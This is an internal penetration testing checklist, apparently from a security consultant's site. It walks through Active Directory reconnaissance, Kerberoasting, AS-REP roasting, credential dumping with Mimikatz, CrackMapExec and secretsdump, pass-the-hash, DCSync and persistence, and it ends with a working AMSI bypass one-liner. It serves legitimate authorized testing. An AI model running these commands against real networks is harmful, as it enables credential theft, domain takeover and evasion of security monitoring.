Internal Penetration Testing

🔍 Initial Reconnaissance

Network Discovery

  • Identify network range (netdiscover, arp-scan)
  • Port scanning (nmap -sV -sC)
  • Identify domain controllers
  • Enumerate DNS records
  • LLMNR/NBT-NS poisoning (Responder)
  • ARP spoofing potential
  • Identify network segmentation

Service Enumeration

  • SMB shares enumeration (smbclient, CrackMapExec)
  • SNMP enumeration
  • LDAP anonymous bind
  • RPC enumeration
  • Web services on internal hosts
  • Database servers (MSSQL, MySQL, Oracle)
  • Printers and IoT devices

👤 Active Directory Enumeration

Domain Information

  • Enumerate domain users (GetADUsers.py)
  • Enumerate domain groups
  • Enumerate domain computers
  • Identify domain admins
  • Check password policy
  • Enumerate GPOs
  • Check for LAPS deployment

BloodHound Collection

# SharpHound
.\SharpHound.exe -c All -d domain.local

# Python collector
bloodhound-python -d domain.local -u user -p pass -ns DC_IP -c all

AD Attack Paths

  • Identify shortest path to DA
  • Find kerberoastable accounts
  • Find AS-REP roastable users
  • Identify delegation issues
  • Find users with DCSync rights
  • Check for GPP passwords

🎫 Kerberos Attacks

Kerberoasting

# Impacket
GetUserSPNs.py domain/user:password -dc-ip DC_IP -request

# Rubeus
.\Rubeus.exe kerberoast /outfile:hashes.txt
  • Request TGS for service accounts
  • Crack service account hashes
  • Identify high-value service accounts

AS-REP Roasting

# Impacket
GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip DC_IP
  • Identify users without pre-auth
  • Request AS-REP tickets
  • Crack obtained hashes

Pass-the-Ticket

  • Extract tickets from memory (Mimikatz)
  • Inject tickets for lateral movement
  • Golden ticket attack
  • Silver ticket attack

🔑 Credential Harvesting

Memory Extraction

# Mimikatz
sekurlsa::logonpasswords
sekurlsa::tickets /export
lsadump::sam
lsadump::dcsync /domain:domain.local /user:Administrator

Credential Locations

  • LSASS memory dump
  • SAM/SYSTEM/SECURITY hives
  • NTDS.dit extraction
  • Cached credentials
  • Browser saved passwords
  • KeePass databases
  • Configuration files

Hash Cracking

# Hashcat
hashcat -m 1000 hashes.txt wordlist.txt  # NTLM
hashcat -m 13100 hashes.txt wordlist.txt # Kerberoast
hashcat -m 18200 hashes.txt wordlist.txt # AS-REP

↔️ Lateral Movement

Techniques

  • Pass-the-Hash (PTH)
  • Pass-the-Ticket (PTT)
  • Overpass-the-Hash
  • PSExec / SMBExec
  • WMI execution
  • WinRM / PowerShell Remoting
  • RDP hijacking
  • DCOM execution

CrackMapExec

# Check admin access
cme smb targets.txt -u user -p pass --local-auth

# Execute commands
cme smb target -u admin -H hash -x "whoami"

# Dump SAM
cme smb target -u admin -H hash --sam

⬆️ Privilege Escalation

Windows PrivEsc

  • Unquoted service paths
  • Weak service permissions
  • AlwaysInstallElevated
  • Scheduled tasks
  • Autologon credentials
  • Token impersonation (Potato attacks)
  • UAC bypass
  • DLL hijacking

Tools

# WinPEAS
.\winPEASx64.exe

# PowerUp
. .\PowerUp.ps1
Invoke-AllChecks

# Seatbelt
.\Seatbelt.exe -group=all

🏰 Domain Dominance

DCSync Attack

# Mimikatz
lsadump::dcsync /domain:domain.local /all /csv

# Impacket
secretsdump.py domain/admin:password@DC_IP

Persistence

  • Golden Ticket
  • Silver Ticket
  • Skeleton Key
  • AdminSDHolder abuse
  • DCSync backdoor
  • Group Policy modification

🛡️ Defense Evasion

Techniques

  • Disable Windows Defender
  • AMSI bypass
  • ETW bypass
  • Process injection
  • Living off the land (LOLBins)
  • Fileless malware techniques

AMSI Bypass Examples

# Basic bypass (encoded)
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Last updated: 2024

Let's Connect

Have a project in mind or want to discuss cybersecurity? Let's talk!

Email LinkedIn GitHub